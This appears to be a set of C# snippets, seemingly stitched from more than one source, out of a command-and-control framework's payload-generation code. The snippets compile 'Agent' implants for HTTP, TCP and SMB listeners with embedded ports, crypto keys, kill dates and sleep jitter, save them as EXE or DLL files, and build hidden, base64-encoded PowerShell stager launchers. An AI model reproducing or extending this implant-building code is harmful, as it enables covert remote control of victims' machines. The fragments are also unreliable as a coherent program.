public static string GenerateAgentPayload(PayloadRequest request) { var result = default(string); var listener = GetListener(request.ListenerId); if (listener == null) { return(result); } var payload = default(byte[]); try { if (listener.Type == ListenerType.HTTP) { var controller = new HttpPayloadController(listener as ListenerHttp); payload = controller.GenerateHttpPayload(request); } else if (listener.Type == ListenerType.TCP) { var controller = new TcpPayloadController(listener as ListenerTcp); payload = controller.GenerateTcpPayload(request); } } catch { return(result); } return(Convert.ToBase64String(payload)); }
public byte[] GenerateTcpPayload(PayloadRequest request) { TempPath = CreateTempDirectory(); var compilerRequest = new Compiler.CompilationRequest { AssemblyName = "Agent", OutputKind = (OutputKind)request.OutputType, Platform = Platform.AnyCpu, ReferenceDirectory = request.TargetFramework == TargetFramework.Net35 ? ReferencesDirectory + Path.DirectorySeparatorChar + "net35" : ReferencesDirectory + Path.DirectorySeparatorChar + "net40", TargetDotNetVersion = (Compiler.DotNetVersion)request.TargetFramework, SourceDirectory = TempPath, References = new List <Compiler.Reference> { new Compiler.Reference { File = "mscorlib.dll", Framework = (Compiler.DotNetVersion)request.TargetFramework, Enabled = true }, new Compiler.Reference { File = "System.dll", Framework = (Compiler.DotNetVersion)request.TargetFramework, Enabled = true }, new Compiler.Reference { File = "System.Core.dll", Framework = (Compiler.DotNetVersion)request.TargetFramework, Enabled = true }, new Compiler.Reference { File = "System.XML.dll", Framework = (Compiler.DotNetVersion)request.TargetFramework, Enabled = true }, new Compiler.Reference { File = "System.Runtime.Serialization.dll", Framework = (Compiler.DotNetVersion)request.TargetFramework, Enabled = true } } }; CloneAgentSourceCode(Listener.Type, TempPath); InsertBindAddress(); InsertBindPort(); InsertKillDate(request.KillDate); InsertCryptoKey(Convert.ToBase64String(Program.ServerController.CryptoController.EncryptionKey)); var result = Compiler.Compile(compilerRequest); RemoveTempDirectory(TempPath); return(result); }
private async void OnGeneratePayload(object obj) { var payloadReq = new PayloadRequest { ListenerId = SelectedListener.Split(":")[0].TrimEnd(), OutputType = OutputType.Dll, SleepInterval = SleepInterval, SleepJitter = SleepJitter, KillDate = KillDate, TargetFramework = TargetFramework.Net40 }; if (SelectedFormat == Formats[0]) { payloadReq.OutputType = OutputType.Exe; } var window = new Window { Height = 100, Width = 360, WindowStartupLocation = WindowStartupLocation.CenterOwner, Content = new ProgressBarView { DataContext = new ProgressBarViewModel { Label = "Building..." } } }; window.Show(); var payload = await PayloadAPI.GenerateAgentPayload(payloadReq); window.Close(); if (payload.Length > 0) { var save = new SaveFileDialog(); if (SelectedFormat == Formats[0]) { save.Filter = "EXE (*.exe)|*.exe"; } else if (SelectedFormat == Formats[1]) { save.Filter = "DLL (*.dll)|*.dll"; } if ((bool)save.ShowDialog()) { File.WriteAllBytes(save.FileName, payload); } } View.Close(); }
public IActionResult GeneratePayload([FromBody] PayloadRequest request) { var user = HttpContext.User.Identity.Name; var payload = Controllers.PayloadControllerBase.GenerateAgentPayload(request); if (!string.IsNullOrEmpty(payload)) { return(Ok(payload)); } else { return(BadRequest()); } }
public static async Task <byte[]> GenerateAgentPayload(PayloadRequest payloadReq) { var apiRequest = new RestRequest("/api/Payload", Method.POST); apiRequest.AddParameter("application/json", JsonConvert.SerializeObject(payloadReq), ParameterType.RequestBody); var apiResponse = await REST.Client.ExecuteAsync(apiRequest); if (apiResponse.StatusCode == System.Net.HttpStatusCode.OK) { return(Convert.FromBase64String(apiResponse.Content.Replace("\"", ""))); } else { return(new byte[] { }); } }
public async Task <ActionResult> PostPayload([FromBody] PayloadRequest request) { if (!_authService.IsAuthenticate(Payload.GroupId)) { return(Unauthorized()); } var form = _mapper.Map <Payload>(request); var apiType = Utility.GetTypeFromUrl(Request.Path.Value); if (apiType == LogType.Empty) { return(NotFound()); } return(await Post <Payload>(form, apiType)); }
public async void GenerateHttpAgentPayloadFail() { await TestClient.ClientLogin(TeamServer.Helpers.GeneratePseudoRandomString(6), "a"); var payloadRequest = new PayloadRequest { ListenerId = "blah", OutputType = OutputType.Exe, TargetFramework = TargetFramework.Net40 }; var apiReq = await TestClient.HttpClient.PostAsync("api/Payload", Helpers.Serialise(payloadRequest)); var result = Helpers.Deserialise <PayloadResponse>(apiReq.Content.ReadAsStringAsync()); Assert.Equal(CompilerStatus.Fail, result.CompilerStatus); Assert.Null(result.EncodedAssembly); Assert.NotNull(result.ErrorMessage); }
private async void OnGeneratePayload(object obj) { var listener = Listeners.FirstOrDefault(l => l.ListenerName.Equals(SelectedListener.Split(":")[0].TrimEnd(), StringComparison.OrdinalIgnoreCase)); var req = new PayloadRequest(); switch (listener.ListenerType) { case ListenerType.HTTP: req = new HttpPayloadRequest { ListenerGuid = listener.ListenerGuid, SleepInterval = SleepInterval, SleepJitter = SleepJitter }; break; case ListenerType.TCP: req = new TcpPayloadRequest { ListenerGuid = listener.ListenerGuid }; break; case ListenerType.SMB: req = new SmbPayloadRequest { ListenerGuid = listener.ListenerGuid }; break; } req.KillDate = KillDate; if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase) || SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase)) { req.OutputType = OutputType.Exe; } var window = new Window { Height = 100, Width = 360, WindowStartupLocation = WindowStartupLocation.CenterOwner, Content = new ProgressBarView { DataContext = new ProgressBarViewModel { Label = "Building..." } } }; window.Show(); var payload = new byte[] { }; switch (listener.ListenerType) { case ListenerType.HTTP: payload = await PayloadAPI.GenerateHttpStager(req as HttpPayloadRequest); break; case ListenerType.TCP: payload = await PayloadAPI.GenerateTcpStager(req as TcpPayloadRequest); break; case ListenerType.SMB: payload = await PayloadAPI.GenerateSmbStager(req as SmbPayloadRequest); break; } window.Close(); if (payload.Length > 0) { if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase)) { var launcher = PowerShellLauncher.GenerateLauncher(payload); var encLauncher = Convert.ToBase64String(Encoding.Unicode.GetBytes(launcher)); var powerShellPayloadViewModel = new PowerShellPayloadViewModel { Launcher = $"powershell.exe -nop -w hidden -c \"{launcher}\"", EncLauncher = $@"powershell.exe -nop -w hidden -enc {encLauncher}", }; var powerShellPayloadView = new PowerShellPayloadView { DataContext = powerShellPayloadViewModel }; powerShellPayloadView.Show(); } else { var save = new SaveFileDialog(); if (SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase)) { save.Filter = "EXE (*.exe)|*.exe"; } else if (SelectedFormat.Contains("DLL", StringComparison.OrdinalIgnoreCase)) { save.Filter = "DLL (*.dll)|*.dll"; } if ((bool)save.ShowDialog()) { File.WriteAllBytes(save.FileName, payload); } } } View.Close(); }